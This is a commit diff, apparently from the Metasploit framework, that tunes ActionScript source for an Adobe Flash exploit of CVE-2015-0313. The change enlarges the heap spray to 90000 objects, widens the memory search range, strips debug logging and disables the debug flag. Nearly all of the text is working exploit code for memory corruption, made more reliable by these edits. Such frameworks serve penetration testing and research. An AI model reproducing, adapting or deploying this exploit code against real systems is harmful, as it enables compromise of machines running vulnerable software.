Allow more search space

2024-10-02 07:40:19 +02:00 · 2015-06-10 12:26:53 -05:00 · 2015-06-10 12:26:53 -05:00 · 7fba64ed14
commit 7fba64ed14
parent ecbddc6ef8
4 changed files with 7 additions and 11 deletions
--- a/data/exploits/CVE-2015-0313/msf.swf
+++ b/data/exploits/CVE-2015-0313/msf.swf
--- a/external/source/exploits/CVE-2015-0313/Exploit.as
+++ b/external/source/exploits/CVE-2015-0313/Exploit.as
@ -52,13 +52,10 @@ public class Exploit extends Sprite

        ba.length = 0x1000
        ba.shareable = true
-		Logger.log("spray")
        for (var i:uint = 0; i < ov.length; i++) {
            ov[i] = new Vector.<uint>(1014)
            ov[i][0] = 0xdeedbeef
-			ov[i][1] = 0xdeadbeef
        }
-		Logger.log("holes")
        for (i = 0; i < 70000; i += 2) {
 			delete(ov[i])
 		}
@ -68,7 +65,6 @@ public class Exploit extends Sprite
        worker.setSharedProperty("mc", mc)
        worker.setSharedProperty("ba", ba)
        ApplicationDomain.currentDomain.domainMemory = ba
-		Logger.log('go')
        worker.start()
    }

--- a/external/source/exploits/CVE-2015-0313/Exploiter.as
+++ b/external/source/exploits/CVE-2015-0313/Exploiter.as
@ -24,7 +24,7 @@ package
        private var payload_address:uint 
        private var stack:Vector.<uint> = new Vector.<uint>(0x6400)
        private var payload_space:Vector.<uint> = new Vector.<uint>(0x6400) 
-        private var spray:Vector.<Object> = new Vector.<Object>(15000)
+        private var spray:Vector.<Object> = new Vector.<Object>(90000)

        public function Exploiter(exp:Exploit, pl:String, os:String, p:ByteArray, uv:Vector.<uint>):void
        {
@ -54,18 +54,18 @@ package
            Logger.log("[*] Exploiter - spray_objects()")
            for (var i:uint = 0; i < spray.length; i++) 
            {
-                spray[i] = new Vector.<Object>(VECTOR_OBJECTS_LENGTH)
+				spray[i] = new Vector.<Object>(VECTOR_OBJECTS_LENGTH)
                spray[i][0] = eba.ba
-                spray[i][1] = exploit 
-                spray[i][2] = stack
-                spray[i][3] = payload_space
+				spray[i][1] = exploit 
+				spray[i][2] = stack
+				spray[i][3] = payload_space
            } 
        }
        
        private function search_objects():uint
        {
            Logger.log("[*] Exploiter - search_objects()")
-            var idx:uint = ev.search_pattern(VECTOR_OBJECTS_LENGTH, 0x8000)
+            var idx:uint = ev.search_pattern(VECTOR_OBJECTS_LENGTH, 0xac100)
            return idx + 1
        }

--- a/external/source/exploits/CVE-2015-0313/Logger.as
+++ b/external/source/exploits/CVE-2015-0313/Logger.as
@ -3,7 +3,7 @@ package
    import flash.external.ExternalInterface

    public class Logger {
-        private static const DEBUG:uint = 1
+        private static const DEBUG:uint = 0
 
        public static function alert(msg:String):void
        {